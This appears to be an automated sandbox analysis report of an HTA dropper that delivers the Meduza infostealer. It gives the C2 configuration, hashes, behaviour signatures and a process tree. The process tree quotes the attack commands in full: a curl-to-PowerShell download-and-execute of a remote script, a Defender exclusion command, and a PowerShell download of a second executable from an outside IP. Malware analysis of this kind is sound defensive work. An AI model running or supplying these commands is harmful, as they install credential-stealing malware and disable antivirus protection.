Analysis
-
max time kernel
93s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-12-2024 07:07
Static task
static1
Behavioral task
behavioral1
Sample
script.hta
Resource
win7-20240903-en
General
-
Target
script.hta
-
Size
551B
-
MD5
4041595b42e7b6e2ce5965cb76ea7da1
-
SHA1
401723ee1ac651ad359b89dd7e3cefea91d6aaa9
-
SHA256
054a6b8b84efa1127eca70abdba55e0f59fc96157504e5c9dcf0d6ff8386717f
-
SHA512
84cfba05772a5adfef0ddfe65bda07d8b908c16de04ea60942338c49a98db625801a986fd999740f61c62650b6e8ebb7f6056e76fe8656d09207f4cf9ffe7c19
Malware Config
Extracted
meduza
193.3.19.151
-
anti_dbg
true
-
anti_vm
true
-
build_name
hdont
-
extensions
.txt
-
grabber_max_size
4.194304e+06
-
port
15666
-
self_destruct
false
Signatures
-
Meduza Stealer payload 1 IoCs
resource yara_rule behavioral2/files/0x0009000000023c76-93.dat family_meduza -
Meduza family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 16 4476 powershell.exe 21 4828 powershell.exe -
pid Process 4476 powershell.exe 4828 powershell.exe 1836 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Launcher.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation ppjsh4jq.puq.exe -
Executes dropped EXE 2 IoCs
pid Process 4100 Launcher.exe 1452 ppjsh4jq.puq.exe -
Loads dropped DLL 3 IoCs
pid Process 4100 Launcher.exe 4100 Launcher.exe 4100 Launcher.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 ppjsh4jq.puq.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 ppjsh4jq.puq.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 ppjsh4jq.puq.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 ppjsh4jq.puq.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 ppjsh4jq.puq.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 api.ipify.org 23 api.ipify.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Launcher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000000-0000-0000-0000-000000000000} Launcher.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000000-0000-0000-0000-000000000000}\AppID = "{00000000-0000-0000-0000-000000000000}" Launcher.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{00000000-0000-0000-0000-000000000000} Launcher.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{00000000-0000-0000-0000-000000000000}\ = "{00000000-0000-0000-0000-000000000000}" Launcher.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{00000000-0000-0000-0000-000000000000}\LaunchPermission = 01000480640000008000000000000000140000000200500003000000000014000100000001010000000000050400000000001800010000000102000000000005200000002002000000001400010000000101000000000005120000000000002009000000010500000000000515000000bccfc2f39d30275f94fcac10e8030000010500000000000515000000bccfc2f39d30275f94fcac1001020000 Launcher.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4476 powershell.exe 4476 powershell.exe 1836 powershell.exe 1836 powershell.exe 4828 powershell.exe 4828 powershell.exe 1452 ppjsh4jq.puq.exe 1452 ppjsh4jq.puq.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 4476 powershell.exe Token: SeDebugPrivilege 1836 powershell.exe Token: SeDebugPrivilege 4828 powershell.exe Token: SeDebugPrivilege 1452 ppjsh4jq.puq.exe Token: SeImpersonatePrivilege 1452 ppjsh4jq.puq.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4100 Launcher.exe 4100 Launcher.exe 4100 Launcher.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4920 wrote to memory of 2576 4920 mshta.exe 84 PID 4920 wrote to memory of 2576 4920 mshta.exe 84 PID 4920 wrote to memory of 2576 4920 mshta.exe 84 PID 2576 wrote to memory of 2084 2576 cmd.exe 86 PID 2576 wrote to memory of 2084 2576 cmd.exe 86 PID 2576 wrote to memory of 2084 2576 cmd.exe 86 PID 2576 wrote to memory of 4476 2576 cmd.exe 87 PID 2576 wrote to memory of 4476 2576 cmd.exe 87 PID 2576 wrote to memory of 4476 2576 cmd.exe 87 PID 4476 wrote to memory of 4100 4476 powershell.exe 88 PID 4476 wrote to memory of 4100 4476 powershell.exe 88 PID 4476 wrote to memory of 4100 4476 powershell.exe 88 PID 4100 wrote to memory of 1836 4100 Launcher.exe 89 PID 4100 wrote to memory of 1836 4100 Launcher.exe 89 PID 4100 wrote to memory of 1836 4100 Launcher.exe 89 PID 4100 wrote to memory of 4828 4100 Launcher.exe 95 PID 4100 wrote to memory of 4828 4100 Launcher.exe 95 PID 4100 wrote to memory of 4828 4100 Launcher.exe 95 PID 4100 wrote to memory of 1452 4100 Launcher.exe 98 PID 4100 wrote to memory of 1452 4100 Launcher.exe 98 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 ppjsh4jq.puq.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 ppjsh4jq.puq.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\script.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\SysWOW64\curl.execurl -s http://147.45.47.15/script.ps13⤵PID:2084
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command -3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Windows\Temp\Launcher.exe"C:\Windows\Temp\Launcher.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\ppjsh4jq.puq.exe'"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828
-
-
C:\Windows\Temp\ppjsh4jq.puq.exe"C:\Windows\Temp\ppjsh4jq.puq.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1452
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5c580727fc0a7a733ea6a446b67ca63f7
SHA1ebdd57fca25df0f759dec07c5382d560df7600c2
SHA256369ef9ccfc9923d44f390840e46cc948796bb79bec86644402608e9a8af80073
SHA5122a1aba5dfe194d53ce71cafb94d147999968aa0a7e5bd1db069da62ab3e06f475af77c258532647dcb7370f4e12c188b99624fc5a9c7c44f196c98e9d2b12733
-
Filesize
18KB
MD58eb76a35570162afdcba81c3159cf0fb
SHA15a48dbc6ee495112d08224e009b16ef242f565d3
SHA2563e26630e7998201363b1a295789aa98b058fc7d68cd4e42a478bdad6fad24004
SHA512ec91b54ef1fdb61f696f149483ed3a4c93c0e1b1929e8be62f1981aabf0888b92560fed96119e60e4e5885e457ca8e63ecbd855c9dd1431585fcb55e755ffd8f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5e017be56699801dc89a8d6d1724eb633
SHA1a7f7aae4744210db8ebaf4da06c167357bc71eca
SHA256aa6b0863022bda1e0c263a75ae2896fe473d3bf57a76efc258b3afec8c157564
SHA5122368425dadc7f22eb11532359d4d1aa97bf3e381f4fd7b62c587e1f8819ef64a0ff7fc75cc5948939fadebc423345ab65a1cd2799bb4136fbea89d1f75dfc8c8
-
Filesize
201KB
MD52696d944ffbef69510b0c826446fd748
SHA1e4106861076981799719876019fe5224eac2655c
SHA256a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a
SHA512c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb
-
Filesize
1.2MB
MD5c6813da66eba357d0deaa48c2f7032b8
SHA16812e46c51f823ff0b0ee17bfce0af72f857af66
SHA2561420f60f053c3ea5605239ee431e5f487245108b1c01be75d16b5246156fa178
SHA51219391c6b12ba8f34a5faf326f8986ef8de4729d614d72bf438c6efa569b3505159ca55f580fe2a02642e5e7a0f1b38a7a9db9f0d66d67ba548d84c230183159e